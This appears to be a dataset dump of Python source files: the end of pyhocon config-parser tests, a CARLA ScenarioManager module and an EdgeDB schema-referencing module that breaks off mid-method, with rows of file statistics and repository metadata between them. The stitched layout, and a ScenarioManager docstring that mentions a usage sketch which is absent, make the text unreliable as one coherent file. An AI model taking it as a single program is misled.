'test_quotes': 'abc\n\n'
}
def test_multi_line_escape(self):
config = ConfigFactory.parse_string(
"""
with-escaped-backslash: \"\"\"
\\\\
\"\"\"
with-newline-escape-sequence: \"\"\"
\\n
\"\"\"
with-escaped-newline-escape-sequence: \"\"\"
\\\\n
\"\"\"
"""
)
assert config['with-escaped-backslash'] == '\n\\\\\n'
assert config['with-newline-escape-sequence'] == '\n\\n\n'
assert config['with-escaped-newline-escape-sequence'] == '\n\\\\n\n'
def test_multiline_with_backslash(self):
config = ConfigFactory.parse_string(
"""
test = line1 \
line2
test2 = test
""")
assert config == {
'test': 'line1 line2',
'test2': 'test'
}
def test_from_dict_with_dict(self):
d = {
'banana': 3,
'apple': 4,
'pear': 1,
'orange': 2,
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_ordered_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['orange'] = 2
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_nested_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['tree'] = {
'a': 'abc\ntest\n',
'b': [1, 2, 3]
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_object_concat(self):
config = ConfigFactory.parse_string(
"""o1 = {
foo : {
a : 1
b : 2
}
}
o2 = {
foo : {
b : 3
c : 4
}
}
o3 = ${o1} ${o2}
"""
)
assert config.get_int('o1.foo.b') == 2
assert config.get_int('o2.foo.b') == 3
assert config.get_int('o3.foo.b') == 3
assert config.get_int('o1.foo.c', default=42) == 42
assert config.get_int('o3.foo.a') == 1
assert config.get_int('o3.foo.c') == 4
def test_issue_75(self):
config = ConfigFactory.parse_string(
"""base : {
bar: ["a"]
}
sub : ${base} {
baz: ${base.bar} ["b"]
}
sub2: ${sub}
"""
)
assert config.get_list('base.bar') == ["a"]
assert config.get_list('sub.baz') == ["a", "b"]
assert config.get_list('sub2.baz') == ["a", "b"]
def test_plain_ordered_dict(self):
config = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
with pytest.raises(ConfigException):
config.as_plain_ordered_dict()
def test_quoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
no_trailing_ws = "foo" "bar "
trailing_ws = "foo" "bar "{ws}
trailing_ws_with_comment = "foo" "bar "{ws}// comment
""".format(ws=' '))
assert config == {
'no_trailing_ws': "foo bar ",
'trailing_ws': "foo bar ",
'trailing_ws_with_comment': "foo bar "
}
def test_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo bar
""")
assert config == {
'a': 'foo bar'
}
def test_quoted_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo "bar" dummy
""")
assert config == {
'a': 'foo bar dummy'
}
def test_quoted_unquoted_strings_with_ws_substitutions(self):
config = ConfigFactory.parse_string(
"""
x = 5
b = test
a = foo "bar" ${b} dummy
c = foo ${x} bv
d = foo ${x} 43
""")
assert config == {
'x': 5,
'b': 'test',
'a': 'foo bar test dummy',
'c': 'foo 5 bv',
'd': 'foo 5 43'
}
def test_complex_substitutions(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: ${c} {
pa: [${a}]
pb: ${b.pa}
}
c: { }
d: { pc: ${b.pa} }
e: ${b}
""", resolve=True)
assert config == {
'a': 1,
'b': {'pa': [1], 'pb': [1]},
'c': {},
'd': {'pc': [1]},
'e': {'pa': [1], 'pb': [1]}
}
def test_assign_next_line(self):
config = ConfigFactory.parse_string(
"""
a = // abc
abc
c =
5
""")
assert config == {
'a': 'abc',
'c': 5
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment(self):
config = ConfigFactory.parse_string(
"""
string_from_env = ${STRING_VAR}
""")
assert config == {
'string_from_env': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref_optional(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${?STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, TRUE_OR_FALSE='false')
def test_bool_from_environment(self):
config = ConfigFactory.parse_string(
"""
bool_from_env = ${TRUE_OR_FALSE}
""")
assert config == {
'bool_from_env': 'false'
}
assert config.get_bool('bool_from_env') is False
@mock.patch.dict(os.environ, INT_VAR='5')
def test_int_from_environment(self):
config = ConfigFactory.parse_string(
"""
int_from_env = ${INT_VAR}
""")
assert config == {
'int_from_env': '5'
}
assert config.get_int('int_from_env') == 5
def test_unicode_dict_key(self):
input_string = u"""
www.sample.com {
us {
name = "first domain"
}
}
www.example-ö.com {
us {
name = "second domain"
}
}
"""
config = ConfigFactory.parse_string(input_string)
assert config.get_string(u'www.sample.com.us.name') == 'first domain'
assert config.get_string(u'www.example-ö.com.us.name') == 'second domain'
with pytest.raises(ConfigWrongTypeException):
config.put(u'www.example-ö', 'append_failure', append=True)
with pytest.raises(ConfigMissingException):
config.get_string(u'missing_unicode_key_ö')
with pytest.raises(ConfigException):
config.get_bool(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_list(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_config(u'www.example-ö.com.us.name')
with pytest.raises(ConfigWrongTypeException):
config.get_string(u'www.example-ö.com.us.name.missing')
def test_with_comment_on_last_line(self):
# Address issue #102
config_tree = ConfigFactory.parse_string("""
foo: "1"
bar: "2"
# DO NOT CHANGE ANY OF THE ABOVE SETTINGS!""")
assert config_tree == {
'foo': '1',
'bar': '2'
}
def test_triple_quotes_same_line(self):
config_tree = ConfigFactory.parse_string('a:["""foo"""", "bar"]')
assert config_tree == {
'a': ['foo"', "bar"]
}
def test_pop(self):
config_tree = ConfigFactory.parse_string('a:{b: 3, d: 6}')
assert 3 == config_tree.pop('a.b', 5)
assert 5 == config_tree.pop('a.c', 5)
expected = {
'a': {'d': 6}
}
assert expected == config_tree
def test_merge_overriden(self):
# Address issue #110
# ConfigValues must merge with its .overriden_value
# if both are ConfigTree
config_tree = ConfigFactory.parse_string("""
foo: ${bar}
foo: ${baz}
bar: {r: 1, s: 2}
baz: {s: 3, t: 4}
""")
assert 'r' in config_tree['foo'] and 't' in config_tree['foo'] and config_tree['foo']['s'] == 3
def test_attr_syntax(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: {
pb: 5
}
""")
assert 5 == config.b.pb
def test_escape_quote(self):
config = ConfigFactory.parse_string(
"""
quoted: "abc\\"test"
unquoted: abc\\"test
""")
assert 'abc"test' == config['quoted']
assert 'abc"test' == config['unquoted']
def test_escape_quote_complex(self):
config = ConfigFactory.parse_string(
"""
value: "{\\"critical\\":\\"0.00\\",\\"warning\\":\\"99.99\\"}"
"""
)
assert '{"critical":"0.00","warning":"99.99"}' == config['value']
def test_keys_with_slash(self):
config = ConfigFactory.parse_string(
"""
/abc/cde1: abc
"/abc/cde2": "cde"
/abc/cde3: "fgh"
""")
assert 'abc' == config['/abc/cde1']
assert 'cde' == config['/abc/cde2']
assert 'fgh' == config['/abc/cde3']
def test_mutation_values(self):
config = ConfigFactory.parse_string(
"""
common : {
}
b1 = []
var = "wrong"
compilerCommon : ${common} {
VAR : ${var}
}
substrate-suite: {
VAR : "right"
}
b1 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
b2 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
""")
assert config.get("b1")[1]['VAR'] == 'right'
assert config.get("b2")[1]['VAR'] == 'right'
def test_escape_sequences_json_equivalence(self):
"""
Quoted strings are in the same format as JSON strings.
See: https://github.com/lightbend/config/blob/master/HOCON.md#unchanged-from-json
"""
source = r"""
{
"plain-backslash": "\\",
"tab": "\t",
"no-tab": "\\t",
"newline": "\n",
"no-newline": "\\n",
"cr": "\r",
"no-cr": "\\r",
"windows": "c:\\temp"
}
"""
expected = {
'plain-backslash': '\\',
'tab': '\t',
'no-tab': '\\t',
'newline': '\n',
'no-newline': '\\n',
'cr': '\r',
'no-cr': '\\r',
'windows': 'c:\\temp',
}
config = ConfigFactory.parse_string(source)
assert config == expected
assert config == json.loads(source)
try:
from dateutil.relativedelta import relativedelta
@pytest.mark.parametrize('data_set', [
('a: 1 months', relativedelta(months=1)),
('a: 1months', relativedelta(months=1)),
('a: 2 month', relativedelta(months=2)),
('a: 3 mo', relativedelta(months=3)),
('a: 3mo', relativedelta(months=3)),
('a: 3 mon', '3 mon'),
('a: 1 years', relativedelta(years=1)),
('a: 1years', relativedelta(years=1)),
('a: 2 year', relativedelta(years=2)),
('a: 3 y', relativedelta(years=3)),
('a: 3y', relativedelta(years=3)),
])
def test_parse_string_with_duration_optional_units(data_set):
config = ConfigFactory.parse_string(data_set[0])
assert config['a'] == data_set[1]
except Exception:
pass
| 28.381397
| 120
| 0.44385
| 6,804
| 69,875
| 4.403733
| 0.084656
| 0.079698
| 0.144979
| 0.102126
| 0.655241
| 0.553316
| 0.440243
| 0.369389
| 0.294363
| 0.240263
| 0
| 0.032573
| 0.419606
| 69,875
| 2,461
| 121
| 28.39293
| 0.706251
| 0.016601
| 0
| 0.284763
| 0
| 0
| 0.115627
| 0.022591
| 0
| 0
| 0
| 0
| 0.245629
| 1
| 0.122398
| false
| 0.003331
| 0.01249
| 0
| 0.13572
| 0.000833
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a1474b58c5efbf18c61bee86e2d5e292bdda41
| 7,416
|
py
|
Python
|
scenario_runner/srunner/scenariomanager/scenario_manager.py
|
cgeller/WorldOnRails
|
d8aa9f7ae67a6b7b71a2fc5ba86bb2a44f221bef
|
[
"MIT"
] | 447
|
2021-03-26T09:29:17.000Z
|
2022-03-30T03:03:35.000Z
|
scenario_runner/srunner/scenariomanager/scenario_manager.py
|
cgeller/WorldOnRails
|
d8aa9f7ae67a6b7b71a2fc5ba86bb2a44f221bef
|
[
"MIT"
] | 56
|
2021-04-21T03:12:50.000Z
|
2022-03-30T13:34:16.000Z
|
scenario_runner/srunner/scenariomanager/scenario_manager.py
|
cgeller/WorldOnRails
|
d8aa9f7ae67a6b7b71a2fc5ba86bb2a44f221bef
|
[
"MIT"
] | 82
|
2021-04-14T04:34:04.000Z
|
2022-03-29T07:35:15.000Z
|
#!/usr/bin/env python
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides the ScenarioManager implementation.
It must not be modified and is for reference only!
"""
from __future__ import print_function
import sys
import time
import py_trees
from srunner.autoagents.agent_wrapper import AgentWrapper
from srunner.scenariomanager.carla_data_provider import CarlaDataProvider
from srunner.scenariomanager.result_writer import ResultOutputProvider
from srunner.scenariomanager.timer import GameTime
from srunner.scenariomanager.watchdog import Watchdog
class ScenarioManager(object):
"""
Basic scenario manager class. This class holds all functionality
required to start and analyze a scenario.
The user must not modify this class.
To use the ScenarioManager:
1. Create an object via manager = ScenarioManager()
2. Load a scenario via manager.load_scenario()
3. Trigger the execution of the scenario via manager.run_scenario()
This function is designed to explicitly control start and end of
the scenario execution
4. Trigger a result evaluation with manager.analyze_scenario()
5. If needed, clean up with manager.stop_scenario() (a commented usage sketch follows below)
"""
def __init__(self, debug_mode=False, sync_mode=False, timeout=2.0):
"""
Sets up the parameters, which will be filled at load_scenario()
"""
self.scenario = None
self.scenario_tree = None
self.scenario_class = None
self.ego_vehicles = None
self.other_actors = None
self._debug_mode = debug_mode
self._agent = None
self._sync_mode = sync_mode
self._running = False
self._timestamp_last_run = 0.0
self._timeout = timeout
self._watchdog = Watchdog(float(self._timeout))
self.scenario_duration_system = 0.0
self.scenario_duration_game = 0.0
self.start_system_time = None
self.end_system_time = None
def _reset(self):
"""
Reset all parameters
"""
self._running = False
self._timestamp_last_run = 0.0
self.scenario_duration_system = 0.0
self.scenario_duration_game = 0.0
self.start_system_time = None
self.end_system_time = None
GameTime.restart()
def cleanup(self):
"""
This function triggers a proper termination of a scenario
"""
if self.scenario is not None:
self.scenario.terminate()
if self._agent is not None:
self._agent.cleanup()
self._agent = None
CarlaDataProvider.cleanup()
def load_scenario(self, scenario, agent=None):
"""
Load a new scenario
"""
self._reset()
self._agent = AgentWrapper(agent) if agent else None
if self._agent is not None:
self._sync_mode = True
self.scenario_class = scenario
self.scenario = scenario.scenario
self.scenario_tree = self.scenario.scenario_tree
self.ego_vehicles = scenario.ego_vehicles
self.other_actors = scenario.other_actors
# To print the scenario tree uncomment the next line
# py_trees.display.render_dot_tree(self.scenario_tree)
if self._agent is not None:
self._agent.setup_sensors(self.ego_vehicles[0], self._debug_mode)
def run_scenario(self):
"""
Trigger the start of the scenario and wait for it to finish/fail
"""
print("ScenarioManager: Running scenario {}".format(self.scenario_tree.name))
self.start_system_time = time.time()
start_game_time = GameTime.get_time()
self._watchdog.start()
self._running = True
while self._running:
timestamp = None
world = CarlaDataProvider.get_world()
if world:
snapshot = world.get_snapshot()
if snapshot:
timestamp = snapshot.timestamp
if timestamp:
self._tick_scenario(timestamp)
self._watchdog.stop()
self.cleanup()
self.end_system_time = time.time()
end_game_time = GameTime.get_time()
self.scenario_duration_system = self.end_system_time - \
self.start_system_time
self.scenario_duration_game = end_game_time - start_game_time
if self.scenario_tree.status == py_trees.common.Status.FAILURE:
print("ScenarioManager: Terminated due to failure")
def _tick_scenario(self, timestamp):
"""
Run next tick of scenario and the agent.
If running synchronously, it also handles the ticking of the world.
"""
if self._timestamp_last_run < timestamp.elapsed_seconds and self._running:
self._timestamp_last_run = timestamp.elapsed_seconds
self._watchdog.update()
if self._debug_mode:
print("\n--------- Tick ---------\n")
# Update game time and actor information
GameTime.on_carla_tick(timestamp)
CarlaDataProvider.on_carla_tick()
if self._agent is not None:
ego_action = self._agent()
# Tick scenario
self.scenario_tree.tick_once()
if self._debug_mode:
print("\n")
py_trees.display.print_ascii_tree(self.scenario_tree, show_status=True)
sys.stdout.flush()
if self.scenario_tree.status != py_trees.common.Status.RUNNING:
self._running = False
if self._agent is not None:
self.ego_vehicles[0].apply_control(ego_action)
if self._sync_mode and self._running and self._watchdog.get_status():
CarlaDataProvider.get_world().tick()
def get_running_status(self):
"""
returns:
bool: False if a watchdog exception occurred, True otherwise
"""
return self._watchdog.get_status()
def stop_scenario(self):
"""
This function is used by the overall signal handler to terminate the scenario execution
"""
self._running = False
def analyze_scenario(self, stdout, filename, junit):
"""
This function is intended to be called from outside and provide
the final statistics about the scenario (human-readable, in form of a junit
report, etc.)
"""
failure = False
timeout = False
result = "SUCCESS"
if self.scenario.test_criteria is None:
print("Nothing to analyze, this scenario has no criteria")
return True
for criterion in self.scenario.get_criteria():
if (not criterion.optional and
criterion.test_status != "SUCCESS" and
criterion.test_status != "ACCEPTABLE"):
failure = True
result = "FAILURE"
elif criterion.test_status == "ACCEPTABLE":
result = "ACCEPTABLE"
if self.scenario.timeout_node.timeout and not failure:
timeout = True
result = "TIMEOUT"
output = ResultOutputProvider(self, result, stdout, filename, junit)
output.write()
return failure or timeout
| 31.965517
| 95
| 0.631338
| 869
| 7,416
| 5.18527
| 0.253165
| 0.066578
| 0.028407
| 0.014425
| 0.148691
| 0.148691
| 0.122947
| 0.093209
| 0.080337
| 0.061252
| 0
| 0.005528
| 0.292611
| 7,416
| 231
| 96
| 32.103896
| 0.853412
| 0.220874
| 0
| 0.185484
| 0
| 0
| 0.039327
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072581
| false
| 0
| 0.072581
| 0
| 0.177419
| 0.056452
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a20e94df54130a998b207ca8a8c8a5a8437f0f
| 43,104
|
py
|
Python
|
edb/schema/referencing.py
|
disfated/edgedb
|
8d78f4a2a578f80780be160ba5f107f5bdc79063
|
[
"Apache-2.0"
] | null | null | null |
edb/schema/referencing.py
|
disfated/edgedb
|
8d78f4a2a578f80780be160ba5f107f5bdc79063
|
[
"Apache-2.0"
] | null | null | null |
edb/schema/referencing.py
|
disfated/edgedb
|
8d78f4a2a578f80780be160ba5f107f5bdc79063
|
[
"Apache-2.0"
] | null | null | null |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2008-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import hashlib
from edb import errors
from edb.common import struct
from edb.edgeql import ast as qlast
from . import delta as sd
from . import inheriting
from . import objects as so
from . import schema as s_schema
from . import name as sn
from . import utils
ReferencedT = TypeVar('ReferencedT', bound='ReferencedObject')
ReferencedInheritingObjectT = TypeVar('ReferencedInheritingObjectT',
bound='ReferencedInheritingObject')
class ReferencedObject(so.DerivableObject):
#: True if the object has an explicit definition and is not
#: purely inherited.
is_local = so.SchemaField(
bool,
default=False,
inheritable=False,
compcoef=0.909,
reflection_method=so.ReflectionMethod.AS_LINK,
)
def get_subject(self, schema: s_schema.Schema) -> Optional[so.Object]:
# NB: classes that inherit ReferencedObject define a `get_subject`
# method dynamically, with `subject = SchemaField`
raise NotImplementedError
def get_referrer(self, schema: s_schema.Schema) -> Optional[so.Object]:
return self.get_subject(schema)
def delete(self, schema: s_schema.Schema) -> s_schema.Schema:
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.DeleteObject, type(self))
cmd = cmdcls(classname=self.get_name(schema))
context = sd.CommandContext(
modaliases={},
schema=schema,
disable_dep_verification=True,
)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self)
parent_cmd.add(cmd)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
schema = delta.apply(schema, context)
return schema
def derive_ref(
self: ReferencedT,
schema: s_schema.Schema,
referrer: so.QualifiedObject,
*qualifiers: str,
mark_derived: bool = False,
attrs: Optional[Dict[str, Any]] = None,
dctx: Optional[sd.CommandContext] = None,
derived_name_base: Optional[str] = None,
inheritance_merge: bool = True,
preserve_path_id: Optional[bool] = None,
refdict_whitelist: Optional[AbstractSet[str]] = None,
transient: bool = False,
name: Optional[str] = None,
**kwargs: Any,
) -> Tuple[s_schema.Schema, ReferencedT]:
if name is None:
derived_name: str = self.get_derived_name(
schema, referrer, *qualifiers,
mark_derived=mark_derived,
derived_name_base=derived_name_base)
else:
derived_name = name
if self.get_name(schema) == derived_name:
raise errors.SchemaError(
f'cannot derive {self!r}({derived_name}) from itself')
derived_attrs: Dict[str, object] = {}
if attrs is not None:
derived_attrs.update(attrs)
derived_attrs['name'] = derived_name
derived_attrs['bases'] = so.ObjectList.create(
schema, [self])
mcls = type(self)
referrer_class = type(referrer)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for_name(schema, derived_name)
refcoll = referrer.get_field_value(schema, refdict.attr)
existing = refcoll.get(schema, refname, default=None)
if existing is not None:
cmdcls: Type[sd.Command] = \
sd.ObjectCommandMeta.get_command_class_or_die(sd.AlterObject,
type(self))
else:
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.CreateObject, type(self))
cmd = cmdcls(classname=derived_name)
for k, v in derived_attrs.items():
cmd.set_attribute_value(k, v)
if existing is not None:
new_bases = derived_attrs['bases']
old_bases = existing.get_bases(schema)
if new_bases != old_bases:
assert isinstance(new_bases, so.ObjectList)
removed_bases, added_bases = inheriting.delta_bases(
[b.get_name(schema) for b in old_bases.objects(schema)],
[b.get_name(schema) for b in new_bases.objects(schema)],
)
rebase_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
inheriting.RebaseInheritingObject, type(self))
rebase_cmd = rebase_cmdcls(
classname=derived_name,
added_bases=added_bases,
removed_bases=removed_bases,
)
cmd.add(rebase_cmd)
context = sd.CommandContext(
modaliases={},
schema=schema,
)
assert isinstance(cmd, sd.ObjectCommand)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self, referrer=referrer)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
if not inheritance_merge:
context.current().inheritance_merge = False
if refdict_whitelist is not None:
context.current().inheritance_refdicts = refdict_whitelist
if mark_derived:
context.current().mark_derived = True
if transient:
context.current().transient_derivation = True
if preserve_path_id:
context.current().preserve_path_id = True
parent_cmd.add(cmd)
schema = delta.apply(schema, context)
derived: ReferencedT = schema.get(derived_name)
return schema, derived
def get_verbosename(
self,
schema: s_schema.Schema,
*,
with_parent: bool = False,
) -> str:
vn = super().get_verbosename(schema)
if with_parent:
subject = self.get_subject(schema)
if subject is not None:
pn = subject.get_verbosename(schema, with_parent=True)
return f'{vn} of {pn}'
return vn
class ReferencedInheritingObject(
so.DerivableInheritingObject,
ReferencedObject,
):
# Indicates that the object has been declared as
# explicitly inherited.
declared_overloaded = so.SchemaField(
bool,
default=False,
compcoef=None,
introspectable=False,
inheritable=False,
ephemeral=True,
)
def get_implicit_bases(
self: ReferencedInheritingObjectT,
schema: s_schema.Schema,
) -> List[ReferencedInheritingObjectT]:
return [
b for b in self.get_bases(schema).objects(schema)
if not b.generic(schema)
]
class ReferencedObjectCommandMeta(sd.ObjectCommandMeta):
_transparent_adapter_subclass: ClassVar[bool] = True
_referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None
def __new__(mcls,
name: str,
bases: Tuple[type, ...],
clsdct: Dict[str, Any],
*,
referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None,
**kwargs: Any
) -> ReferencedObjectCommandMeta:
cls = super().__new__(mcls, name, bases, clsdct, **kwargs)
assert isinstance(cls, ReferencedObjectCommandMeta)
if referrer_context_class is not None:
cls._referrer_context_class = referrer_context_class
return cls
class ReferencedObjectCommandBase(
sd.QualifiedObjectCommand[ReferencedT],
metaclass=ReferencedObjectCommandMeta,
):
@classmethod
def get_referrer_context_class(
cls,
) -> Type[sd.ObjectCommandContext[so.Object]]:
if cls._referrer_context_class is None:
raise TypeError(
f'referrer_context_class is not defined for {cls}')
return cls._referrer_context_class
@classmethod
def get_referrer_context(
cls,
context: sd.CommandContext,
) -> Optional[sd.ObjectCommandContext[so.Object]]:
"""Get the context of the command for the referring object, if any.
E.g. for a `create/alter/etc concrete link` command this would
be the context of the `create/alter/etc type` command.
"""
ctxcls = cls.get_referrer_context_class()
ctx = context.get(ctxcls) # type: ignore
return cast(Optional[sd.ObjectCommandContext[so.Object]], ctx)
@classmethod
def get_referrer_context_or_die(
cls,
context: sd.CommandContext,
) -> sd.ObjectCommandContext[so.Object]:
ctx = cls.get_referrer_context(context)
if ctx is None:
raise RuntimeError(f'no referrer context for {cls}')
return ctx
class StronglyReferencedObjectCommand(
ReferencedObjectCommandBase[ReferencedT]
):
pass
class ReferencedObjectCommand(ReferencedObjectCommandBase[ReferencedT]):
@classmethod
def _classname_from_ast(cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
context: sd.CommandContext
) -> sn.Name:
name = super()._classname_from_ast(schema, astnode, context)
parent_ctx = cls.get_referrer_context(context)
if parent_ctx is not None:
assert isinstance(parent_ctx.op, sd.QualifiedObjectCommand)
referrer_name = parent_ctx.op.classname
base_name: str
try:
base_ref = utils.ast_to_object(
astnode.name,
modaliases=context.modaliases,
schema=schema,
)
except errors.InvalidReferenceError:
base_name = sn.Name(name)
else:
base_name = base_ref.get_name(schema)
quals = cls._classname_quals_from_ast(
schema, astnode, base_name, referrer_name, context)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
name = sn.Name(name=pnn, module=referrer_name.module)
assert isinstance(name, sn.Name)
return name
@classmethod
def _classname_from_name(
cls,
name: sn.SchemaName,
referrer_name: sn.SchemaName,
) -> sn.Name:
base_name = sn.shortname_from_fullname(name)
quals = cls._classname_quals_from_name(name)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
return sn.Name(name=pnn, module=referrer_name.module)
@classmethod
def _classname_quals_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
base_name: str,
referrer_name: str,
context: sd.CommandContext,
) -> Tuple[str, ...]:
return ()
@classmethod
def _classname_quals_from_name(
cls,
name: sn.SchemaName,
) -> Tuple[str, ...]:
return ()
@classmethod
def _name_qual_from_exprs(cls,
schema: s_schema.Schema,
exprs: Iterable[str]) -> str:
m = hashlib.sha1()
for expr in exprs:
m.update(expr.encode())
return m.hexdigest()
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
subject_ctx = self.get_referrer_context(context)
ref_astnode: Type[qlast.DDLOperation] = getattr(self,
'referenced_astnode',
None)
if subject_ctx is not None and ref_astnode is not None:
return ref_astnode
else:
if isinstance(self.astnode, (list, tuple)):
return self.astnode[1]
else:
return self.astnode
def _build_alter_cmd_stack(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: so.Object,
*,
referrer: Optional[so.Object] = None
) -> Tuple[sd.DeltaRoot, sd.Command]:
delta = sd.DeltaRoot()
if referrer is None:
assert isinstance(scls, ReferencedObject)
referrer = scls.get_referrer(schema)
obj = referrer
object_stack = []
if type(self) != type(referrer):
object_stack.append(referrer)
while obj is not None:
if isinstance(obj, ReferencedObject):
obj = obj.get_referrer(schema)
object_stack.append(obj)
else:
obj = None
cmd: sd.Command = delta
for obj in reversed(object_stack):
assert obj is not None
alter_cmd_cls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, type(obj))
alter_cmd = alter_cmd_cls(classname=obj.get_name(schema))
cmd.add(alter_cmd)
cmd = alter_cmd
return delta, cmd
class CreateReferencedObject(
ReferencedObjectCommand[ReferencedT],
sd.CreateObject[ReferencedT],
):
referenced_astnode: ClassVar[Type[qlast.ObjectDDL]]
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
if isinstance(astnode, cls.referenced_astnode):
objcls = cls.get_schema_metaclass()
referrer_ctx = cls.get_referrer_context_or_die(context)
referrer_class = referrer_ctx.op.get_schema_metaclass()
referrer_name = referrer_ctx.op.classname
refdict = referrer_class.get_refdict_for_class(objcls)
cmd.set_attribute_value(
refdict.backref_attr,
so.ObjectShell(
name=referrer_name,
schemaclass=referrer_class,
),
)
cmd.set_attribute_value('is_local', True)
if getattr(astnode, 'is_abstract', None):
cmd.set_attribute_value('is_abstract', True)
return cmd
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
if implicit_bases and not context.declarative:
mcls = self.get_schema_metaclass()
Alter = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
alter = Alter(classname=self.classname)
return alter._get_ast_node(schema, context)
else:
return super()._get_ast_node(schema, context)
@classmethod
def as_inherited_ref_cmd(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
astnode: qlast.ObjectDDL,
parents: Any) -> sd.Command:
cmd = cls(classname=cls._classname_from_ast(schema, astnode, context))
cmd.set_attribute_value('name', cmd.classname)
return cmd
@classmethod
def as_inherited_ref_ast(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
name: str,
parent: ReferencedObject) -> qlast.ObjectDDL:
nref = cls.get_inherited_ref_name(schema, context, parent, name)
astnode_cls = cls.referenced_astnode
astnode = astnode_cls(name=nref)
assert isinstance(astnode, qlast.ObjectDDL)
return astnode
@classmethod
def get_inherited_ref_name(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
parent: ReferencedObject,
name: str
) -> qlast.ObjectRef:
# reduce name to shortname
if sn.Name.is_qualified(name):
shortname: str = sn.shortname_from_fullname(sn.Name(name))
else:
shortname = name
nref = qlast.ObjectRef(
name=shortname,
module=parent.get_shortname(schema).module,
)
return nref
def _create_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return super()._create_innards(schema, context)
else:
referrer = referrer_ctx.scls
schema = self._create_ref(schema, context, referrer)
return super()._create_innards(schema, context)
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
referrer_cls = type(referrer)
mcls = type(self.scls)
refdict = referrer_cls.get_refdict_for_class(mcls)
schema = referrer.add_classref(schema, refdict.attr, self.scls)
return schema
class DeleteReferencedObjectCommand(
ReferencedObjectCommand[ReferencedT],
sd.DeleteObject[ReferencedT],
):
def _delete_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
